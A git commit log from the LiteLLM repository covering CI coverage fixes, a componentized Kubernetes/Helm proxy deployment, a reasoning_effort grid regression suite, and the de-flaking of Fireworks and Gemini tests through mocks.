- Hardcode `/home/mateo` paths everywhere %h was used. systemd expands
  %h against the *manager's* home (/root for PID 1) in *system* units,
  not against the User= directive. The mismatch made ReadWritePaths
  point at /root/.cache and the namespace setup failed with
  status=226/NAMESPACE before run_daily.sh ever started.
- Explicit Environment=PATH so `uv` and `claude` under
  ~/.local/bin are visible to the up-front command-presence check;
  systemd's default PATH excludes them.
- Expand ReadWritePaths to include ~/.claude (CLI per-session state)
  and ~/.config/gh (gh host config fallback); both are written under
  ProtectHome=read-only.

env.example refreshed: drop AWS_ACCESS_KEY_ID/SECRET +
GOOGLE_APPLICATION_CREDENTIALS in favor of AWS_BEARER_TOKEN_BEDROCK and
ADC via the VM's metadata server; document AGENT_SHIN_GITHUB_TOKEN,
FORK_OWNER/FORK_REPO overrides, and VERTEXAI_LOCATION=global.
2026-05-16 20:37:01 +00:00
yuneng-jiang
62dca9e977
fix(ci): flag codecov uploads, enable carryforward, close coverage gaps (#28028)
* fix(ci): flag codecov uploads and enable carryforward

Coverage uploads from GHA and CircleCI were unflagged. Commits that
receive the push-triggered workflows more than once (re-runs, or branches
cut at the same SHA) accumulated many overlapping flagless sessions, and
Codecov's per-commit merge dropped the largest, ubiquitously-imported
files (router.py, proxy_server.py, main.py, utils.py, cost_calculator.py)
from the report even though the uploaded XMLs contained them.

- codecov.yaml: flag_management.default_rules.carryforward: true
- GHA reusable bases: tag each upload with its workflow/shard name
- CircleCI: tag the combined upload "circleci"; also combine the
  agent / google_generate_content_endpoint / litellm_utils datafiles
  that were produced and required but missing from the combine list

* fix(ci): close coverage gaps in proxy-legacy, router-unit, auth-ui, caching-redis

- test-unit-proxy-legacy: route through _test-unit-base so the full
  proxy_unit_tests suite (incl. comprehensive test_proxy_server*.py) is
  measured and uploaded with per-group flags (was plain pytest, no --cov)
- _test-unit-services-base: declare the enable-redis input + the six
  secrets test-unit-caching-redis passes; that workflow had a workflow_call
  signature mismatch and startup_failed on every push (never ran).
  Changes are additive/optional - proxy-db and security callers unchanged
- circleci: add --cov + persist + combine + upload-coverage requires for
  litellm_router_unit_testing (tests/router_unit_tests) and
  auth_ui_unit_tests (tests/proxy_admin_ui_tests); neither was covered
  anywhere. Redundant -k subset jobs left as-is (local_testing covers them)

* fix(ci): remove dead GHA Redis workflow; keep Redis on CircleCI only

CircleCI redis_caching_unit_tests already runs the exact same files
(tests/local_testing/test_dual_cache.py, test_redis_batch_optimizations.py,
test_router_utils.py) with --cov, and that datafile is already combined
and uploaded. The GHA test-unit-caching-redis workflow was redundant and
had never run (workflow_call signature mismatch -> startup_failure on
every push).

- Delete .github/workflows/test-unit-caching-redis.yml
- Revert _test-unit-services-base.yml to the flag-fix state (drop the
  enable-redis input / secrets / env wiring added only to prop up the
  GHA Redis workflow); the verified per-upload flags line is kept
- The only single-star "litellm_*" branch glob lived in the deleted
  file; no other single-star globs exist, so none remain to widen

* fix(ci): keep proxy-legacy as a standalone job to preserve required check names

Routing proxy-legacy through the reusable workflow renamed each check from
the bare matrix name (e.g. "proxy-response-and-misc") to
"proxy-response-and-misc / Run tests". Those bare names are required status
checks in branch protection, so the old contexts never reported and PRs sat
"Expected — Waiting for status to be reported" indefinitely.

Restore the original standalone matrix job (job name == matrix name, so the
required contexts report again) and add coverage in place: --cov on pytest
plus an OIDC Codecov upload flagged proxy-legacy-<group>. Net effect of the
gap-#2 fix is preserved (flagged coverage for tests/proxy_unit_tests/**)
without changing any check name.

* revert(ci): drop all proxy-legacy changes from this PR

tests/proxy_unit_tests/** is already fully covered by test-unit-proxy-db
(its shard-coverage guard fails CI if any file in that dir is unassigned),
which this PR already flags + carryforwards. Adding --cov and id-token:write
to the legacy pull_request job was redundant and put OIDC on a job that runs
untrusted PR code. Restore the file to the base version verbatim so this PR
no longer touches proxy-legacy at all (also restores its original required
check names). Retiring proxy-legacy in favor of proxy-db on pull_request is
a separate effort that needs a branch-protection change.
2026-05-16 10:56:32 -07:00
yuneng-jiang
57e5e4a3b7
Merge pull request #28036 from BerriAI/litellm_grid-v4-e2e-tests-cZRwz
test(ci): add reasoning_effort grid e2e regression suite
2026-05-16 09:38:40 -07:00
Yassin Kortam
014cb8fa9d
feat: add componentized proxy deployment with gateway, backend, ui, and migrations (#27557)
Split the monolithic LiteLLM proxy into independently scalable Kubernetes components to allow separate horizontal scaling of the LLM data plane and management API surfaces

- Add DatabaseURLSettings pydantic-settings model that assembles DATABASE_URL (and optional DATABASE_URL_READ_REPLICA) from discrete DATABASE_* env vars before Prisma initializes, supporting both IAM token auth (minting short-lived RDS tokens) and password auth; replaces the CLI-only path that componentized entrypoints bypass
- Add gateway component (port 4000) that trims the proxy route table to the LLM data-plane surface (chat, embeddings, completions, audio, realtime, provider passthroughs, health/metrics) via an allowlist applied inside the lifespan context so plugin-registered routes are captured
- Add backend component (port 4001) that exposes the management/admin surface (keys, users, teams, orgs, spend analytics, model management, SSO, audit logs) with a complementary allowlist
- Add ui component — Next.js static export served by nginx (port 3000) with RSC payload routing, asset prefix aliasing, and SPA fallback for dashboard routes
- Add migrations component with dedicated Dockerfile that runs prisma migrate deploy via a Helm pre-install/pre-upgrade Job, eliminating per-pod schema contention on the Prisma advisory lock
- Add Helm chart (helm/litellm) with separate Deployments, Services, HPAs, and ConfigMap for each component; shared _helpers.tpl emits DATABASE_*, IAM_TOKEN_DB_AUTH, REDIS_*, and DISABLE_SCHEMA_UPDATE env vars from chart values; ingress template routes traffic to the correct component by path prefix
- Add comprehensive tests for DatabaseURLSettings covering IAM auth, password auth, read replica fallbacks, operator-pinned URL preservation, and percent-encoding; add coverage test asserting gateway + backend allowlist union equals the full proxy route set
- Add pydantic-settings>=2.14.1 as a proxy extra dependency and update liccheck allowlist

Co-authored-by: Yassin Kortam <yassinkortam@g.ucla.edu>
2026-05-16 09:25:17 -07:00
Mateo Wang
4e8ac3151d
Merge branch 'litellm_internal_staging' into litellm_grid-v4-e2e-tests-cZRwz
Resolve conflicts in the five unrelated CI-flake fixes I previously landed
on this branch -- staging shipped stronger versions (mocked HTTP for the
Fireworks tests, mocked image-fetch for the Gemini size-limit test, switched
the openapi-compliance test to the Interaction response schema instead of
dropping the assertion). Take staging's version of all five files and drop
my now-unreachable 429-skip lines from the Gemini test that the auto-merge
left behind.
2026-05-16 16:19:38 +00:00
Mateo Wang
f9485f1bf6
refactor: strip PR-introduced docstrings and explanatory comments 2026-05-16 15:33:29 +00:00
Mateo Wang
fb7091ef79
refactor(reasoning_effort_grid): tighten test helpers per Greptile review
Two P2 nits flagged by Greptile on PR 28036:

1. _build_completion_kwargs() defaulted vertex_project to "vertex-check-481318"
   when VERTEX_PROJECT was unset. That value is a specific GCP project that
   doesn't belong to this repo, so if the env-var skip guard were ever
   bypassed (misconfig, direct helper call), the test would silently issue
   calls to a foreign project rather than failing loudly. Drop the fallback
   and read os.environ["VERTEX_PROJECT"] directly, mirroring how
   AZURE_FOUNDRY_* are handled.

2. _build_messages_kwargs() was a one-liner that returned the result of
   _build_completion_kwargs() unchanged -- a dead abstraction with one
   caller. Inline at the _call_messages call site and delete the helper.
2026-05-16 15:11:36 +00:00
Mateo Wang
18c932210a
fix(test_gemini): skip after pytest.raises catches the 429-wrapped ImageFetchError
litellm.ImageFetchError is a subclass of BadRequestError, so when
Wikimedia returns 429 the pytest.raises(ImageFetchError) block matches
and swallows the exception -- the outer try/except never fires. Drop the
try/except and check the captured error message for "Status code: 429"
after the raises block, calling pytest.skip in that case. Same intent,
right control flow.
2026-05-16 07:54:57 +00:00
Mateo Wang
2b00ea9ee4
test(ci): skip Fireworks tests on 404 + Gemini image-size test on 429
Four pre-existing flakes on main that gate this branch's workflow even
though they're unrelated to the reasoning_effort_grid suite:

1. tests/local_testing/test_completion.py::test_completion_fireworks_ai
2. tests/local_testing/test_completion_cost.py::test_completion_cost_fireworks_ai[fireworks_ai/llama-v3p3-70b-instruct]
3. tests/llm_translation/test_fireworks_ai_translation.py::test_document_inlining_example[False]

   The Fireworks-hosted `llama-v3p3-70b-instruct` deployment is currently
   returning 404 "Model not found, inaccessible, and/or not deployed".
   These tests pass when the model is deployed; the issue is upstream
   capacity, not our code path. Wrap the live call in a try/except that
   pytest.skip's on litellm.NotFoundError so a Fireworks deployment hiccup
   no longer fails CI for unrelated PRs.

4. tests/llm_translation/test_gemini.py::test_gemini_image_size_limit_exceeded

   The test fetches the 32MB "Blue Marble 2002" image from Wikimedia to
   exercise the 50MB image-size cap. CI runners share an IP pool with
   noisy traffic, so Wikimedia routinely returns HTTP 429. The size-limit
   check never gets a chance to fire. Catch the 429 BadRequestError and
   pytest.skip in that case.

None of these belong on this PR conceptually, but they're included per
request to unblock the workflow before morning.
2026-05-16 07:47:25 +00:00
Mateo Wang
e29ea53c31
fix(reasoning_effort_grid): classify status by exception status_code, not class
The anthropic_messages route wraps client-side BadRequestError as
AnthropicError (a BaseLLMException subclass) with status_code=400, so
"except BadRequestError" missed those cells and they fell through to the
generic Exception arm, returning 500 instead of the expected 400.

Replace the isinstance-on-BadRequestError check with a tiny classifier
that prefers BadRequestError membership, then falls back to the exception's
status_code attribute (set by every BaseLLMException subclass), then 500.
Apply to both _call_chat and _call_messages for consistency.

Fixes the 13 CircleCI llm_translation_testing failures on
bedrock_invoke_messages cells where the effort was disabled / invalid /
empty / xhigh-on-unsupported / max-on-unsupported.
2026-05-16 07:32:25 +00:00
Mateo Wang
90cdbb92d7
fix(tests): use litellm.anthropic_messages entrypoint + drop unstable openapi field
Two CI failures, both pre-existing in different ways:

1. reasoning_effort_grid: all 33 bedrock_invoke_messages cells failed with
   AttributeError("module 'litellm' has no attribute 'messages'"). litellm
   exposes the async Anthropic Messages entrypoint as litellm.anthropic_messages
   (via "from .llms.anthropic.experimental_pass_through.messages.handler
   import *" in litellm/__init__.py), not litellm.messages.acreate. Swap
   the call.

2. tests/test_litellm/interactions/test_openapi_compliance.py::TestResponseCompliance::test_interaction_response_fields
   asserts the live Google spec contains "steps". Google's spec has churned
   through "outputs" -> "steps" -> neither, and presently carries neither.
   The test broke on main as soon as upstream dropped "steps"; pulling the
   key off the assert list realigns the test with the live schema. Re-add
   the per-turn output field once upstream stabilizes on a name.

The openapi-compliance fix doesn't belong to this PR conceptually but is
included here per request to unblock CI before the morning.
2026-05-16 06:59:08 +00:00
yuneng-jiang
ec2f3aadb8
Merge pull request #28039 from BerriAI/litellm_/nostalgic-johnson-eeb7c3
test(gemini): de-flake test_gemini_image_size_limit_exceeded
2026-05-15 23:18:56 -07:00
Yuneng Jiang
8c537f70a3
test(gemini): drop 100MB allocation in size-limit mock
The Content-Length header check in _process_image_response rejects the
image before the body is streamed, so the mock body never needs to be
materialized. Use an empty body instead of b"x" * 100MB (addresses
greptile/cursor review feedback).
2026-05-15 23:10:38 -07:00
Yuneng Jiang
2130bdc5b6
Merge remote-tracking branch 'origin/litellm_internal_staging' into litellm_/nostalgic-johnson-eeb7c3 2026-05-15 22:40:08 -07:00
Yuneng Jiang
1cf2d7f286
test(gemini): de-flake test_gemini_image_size_limit_exceeded
Mock the image fetch instead of downloading a 50MB+ image from
upload.wikimedia.org. The runner was intermittently rate-limited
(HTTP 429), so the code raised "Unable to fetch image ... Status
code: 429" and the size-limit assertions failed even though
pytest.raises(litellm.ImageFetchError) still matched.

Mirror the established LargeImageClient pattern in
tests/test_litellm/litellm_core_utils/test_image_handling.py: stub
litellm.module_level_client with a response whose Content-Length
exceeds the 50MB limit and bypass SSRF validation, so the
size-limit rejection path is exercised deterministically with no
external network dependency.
2026-05-15 22:34:57 -07:00
yuneng-jiang
935a1c0eb9
Merge pull request #28037 from BerriAI/litellm_/wonderful-lehmann-265845
Some checks failed
Unit Tests: Proxy DB Operations / proxy-utils (push) Blocked by required conditions
Unit Tests: Proxy DB Operations / assert-shard-coverage (push) Waiting to run
Unit Tests: Proxy DB Operations / auth-checks (push) Blocked by required conditions
Unit Tests: Proxy DB Operations / budgets (push) Blocked by required conditions
Unit Tests: Proxy DB Operations / custom-logging (push) Blocked by required conditions
Unit Tests: Proxy DB Operations / db-and-spend (push) Blocked by required conditions
Unit Tests: Proxy DB Operations / endpoints-and-responses (push) Blocked by required conditions
Unit Tests: Proxy DB Operations / guardrails-hooks (push) Blocked by required conditions
Unit Tests: Proxy DB Operations / jwt-and-keys (push) Blocked by required conditions
Unit Tests: Proxy DB Operations / key-generation (push) Blocked by required conditions
Unit Tests: Proxy DB Operations / logging-misc (push) Blocked by required conditions
Unit Tests: Proxy DB Operations / proxy-runtime (push) Blocked by required conditions
Unit Tests: Proxy DB Operations / proxy-server-core (push) Blocked by required conditions
Unit Tests: Proxy DB Operations / schema-migration (push) Blocked by required conditions
Unit Tests: Security / security (push) Waiting to run
Unit Tests: Caching (Redis) / caching-redis (push) Has been cancelled
test(interactions): validate response fields against Interaction schema
2026-05-15 22:34:43 -07:00
Yuneng Jiang
b5db7ed37d
test(fireworks): mock remaining live smoke tests
test_completion_fireworks_ai and test_completion_cost_fireworks_ai
made real Fireworks calls and broke whenever Fireworks rotated its
serverless catalog (no externally-verifiable model list exists).
They also asserted nothing — just printed.

Mock the HTTP post and assert real behavior instead: the request is
built with the right model/messages and the OpenAI-compatible
response parses back; the cost path yields a non-zero cost against
the local cost map. No network, no model dependency, stronger than
the old smoke checks.
2026-05-15 22:28:27 -07:00
Yuneng Jiang
9770efe9e1
test(fireworks): mock document-inlining test instead of live call
The live deepseek-v3p1 call kept hitting Fireworks NOT_FOUND because
Fireworks rotates its serverless catalog and no externally-verifiable
list exists. The [False] branch also never sent an image, so it only
proved the model responded.

Mock the HTTP post (mirrors test_global_disable_flag_with_transform_
messages_helper) and assert the real behavior: #transform=inline is
appended to the PDF URL unless disabled. No network, no model
dependency, and stronger coverage than the old live test.
2026-05-15 22:25:37 -07:00
Yuneng Jiang
39a1d438f2
test(fireworks): replace deprecated llama-v3p3-70b-instruct model
Fireworks removed llama-v3p3-70b-instruct from serverless, so every
live test using it now fails with NotFoundError ("Model not found,
inaccessible, and/or not deployed").

Swap the 6 references (3 files) to the currently-served
accounts/fireworks/models/deepseek-v3p1 — the canonical model in
Fireworks' current docs examples and present in LiteLLM's cost map.
test_get_model_params_fireworks_ai is a pure pricing-heuristic test
(no network) asserting the >16b branch, so it uses llama-v3p1-70b-
instruct instead to keep the "fireworks-ai-above-16b" assertion and
branch coverage intact.
2026-05-15 22:17:10 -07:00
Yuneng Jiang
11393f86f5
test(interactions): validate response fields against Interaction schema
Google restructured the live spec at ai.google.dev/static/api/
interactions.openapi.json: the output-only fields (notably the
`steps` array, formerly `outputs`) moved off the request schema
`CreateModelInteractionParams` onto a dedicated `Interaction`
response schema. The response-side tests still read from the
request schema, so `test_interaction_response_fields` failed with
"Output field 'steps' not in spec".

Point `test_interaction_response_fields` and `test_status_enum_values`
at the `Interaction` schema (the semantic response object; all output
fields incl. `steps` present there). Request-side tests keep using
`CreateModelInteractionParams` (all request fields verified still
present). 13/13 pass against the current live spec.
2026-05-15 21:13:36 -07:00
yuneng-jiang
c706184444
Merge pull request #28029 from BerriAI/litellm_/determined-yalow-811fee
test(proxy): isolate run_server CLI tests from prisma DB-setup path
2026-05-15 20:24:25 -07:00
Mateo Wang
d084782661
Merge branch 'litellm_grid-v4-e2e-tests-cZRwz' of http://127.0.0.1:41997/git/BerriAI/litellm into litellm_grid-v4-e2e-tests-cZRwz 2026-05-16 03:22:30 +00:00
Mateo Wang
f77324d766
refactor(tests): move reasoning_effort grid suite under llm_translation, drop v4 naming
- Drop the "v4" suffix throughout: it referred to the QA sweep iteration,
  not this test suite. There's only one regression suite, so just call it
  reasoning_effort_grid.
- Move tests/test_litellm/reasoning_effort_grid_v4/ -> tests/llm_translation/
  reasoning_effort_grid/. Two reasons:
    1. The parent tests/test_litellm/conftest.py installs an autouse fixture
       (isolate_host_aws_config) that clears every AWS_* env var before each
       test, which would silently skip every Bedrock cell.
    2. tests/llm_translation/conftest.py already wires up the Redis-backed
       VCR persister and auto-applies @pytest.mark.vcr to every collected
       item via apply_vcr_auto_marker_to_items. Living under that conftest
       means the suite gets cassette replay for free -- first CI run with
       provider creds records 231 cassettes, every subsequent run replays
       them with no live spend.
- Trim the suite's own conftest down to just the wire_capture fixture; the
  inherited llm_translation conftest covers the VCR plumbing.
- Drop the dedicated reasoning_effort_grid_v4_e2e CircleCI job. The existing
  llm_translation_testing job globs tests/llm_translation/**/test_*.py, so
  the suite is gated by an existing job with no new wiring.
2026-05-16 03:21:28 +00:00
Cursor Agent
51dff1ff79
fix(reasoning_effort_grid_v4): grant sonnet-4-6 entries the max-effort cap
The runtime _validate_effort_for_model allows effort='max' for any
Claude 4.6 model (opus or sonnet), and model_prices_and_context_window
sets supports_max_reasoning_effort: true for claude-sonnet-4-6. The
grid spec previously gave sonnet-4-6 entries _CAPS_NONE, so expected()
returned status=400 for effort='max', which mismatched the runtime's
status=200 and caused 6 cells (one per route) to fail.

Rename _CAPS_OPUS_4_6 to _CAPS_4_6 (since the cap set is shared by
opus and sonnet 4.6) and assign it to all sonnet-4-6 entries.

Co-authored-by: Yassin Kortam <yassin@berri.ai>
2026-05-16 03:12:20 +00:00
Cursor Agent
432742778a
fix(reasoning_effort_grid_v4): cleanup unused fixture, parse converse body, guard budget tokens
- Remove unused vertex_credentials_path fixture (and now-unused os import)
  from conftest.py.
- Parse Bedrock Converse complete_input_dict (logged as a JSON string by
  converse_handler.py) before passing to _assert_cell, so dict accessors
  work uniformly across routes.
- Extend _BUDGET_TOKENS with xhigh and max entries so the budget-mode
  branch in expected() cannot KeyError if a future budget model gains
  the matching cap.

Co-authored-by: Yassin Kortam <yassin@berri.ai>
2026-05-16 02:58:20 +00:00
Mateo Wang
fec4ae69e0
test(ci): add reasoning_effort grid v4 e2e regression suite
Encode the 231-cell QA sweep (21 provider x model combos x 11 effort
values) from #27039 / #27074 as an automated CircleCI-gated regression
suite. Each cell hits the real provider endpoint, captures the outgoing
wire body via a pre-call CustomLogger, and asserts:

- thinking.type, output_config.effort, thinking.budget_tokens, max_tokens
  in the captured request body (regression signal for silent drops/strips
  in any provider transformation)
- HTTP status (200 vs BadRequestError -> 400) returned by litellm
  (regression signal for clean-error vs leaked-500 mappings)

The matrix is encoded as a small rule set keyed by (model_mode, effort)
plus per-model xhigh/max capability overrides, then expanded across the
five chat-completion routes (Anthropic direct, Azure AI Foundry, Vertex
AI, Bedrock Converse, Bedrock Invoke /chat) and the Bedrock Invoke
/v1/messages route. Cells skip at runtime when the route's provider env
vars are absent, so PR builds without credentials no-op gracefully.

Wired into CircleCI as the reasoning_effort_grid_v4_e2e job behind the
existing main / litellm_* branch filter.
2026-05-16 02:46:47 +00:00
Cursor Agent
1b30abf4a8
fix(claude_code/conftest): drop phantom fail rows and use positive feature filter
- pytest_runtest_makereport: skip the defensive fail-row append when
  the test has already recorded a fail via .add(), so the common pattern
  of '.add(fail) per failing model, then pytest.fail() to surface them'
  no longer produces duplicate rows in compat-results.json.
- _infer_feature_and_provider: validate the parent directory against
  manifest.yaml instead of relying on a negative '_-prefix' filter, so
  non-feature sibling dirs (e.g. cron_vm) can't leak rows into the
  artifact or pollute the rate-limit summary counters.

Co-authored-by: Yassin Kortam <yassin@berri.ai>
2026-05-16 02:37:58 +00:00
Cursor Agent
5523d74236
fix(claude_code/conftest): record fail on setup error or partial crash
Two related gaps in pytest_runtest_makereport let real failures show up as
green (or absent) cells in the published compatibility matrix:

1. Setup-phase failures (broken fixtures / imports) only produce a report
   with when="setup"; the call phase never runs. The hook filtered on
   when=="call" and returned, leaving no row for the cell. The matrix
   builder then aggregated the empty cell to "not_tested" instead of
   "fail".

2. A test that called compat_result.add({"status": "pass"}) for some
   models and then raised before completing the rest produced a partial
   list of pass entries. The "if not collected" guard was bypassed
   because the list was non-empty, so no fail row was added. The cell
   aggregator's all-pass check then returned pass for a cell that was
   never fully exercised.

Now the hook also handles when=="setup" on failure, and always appends a
fail row when report.failed — preserving any partial pass entries from
add() for diagnostics while ensuring the cell aggregator surfaces the
crash.

Co-authored-by: Yassin Kortam <yassin@berri.ai>
2026-05-16 02:23:26 +00:00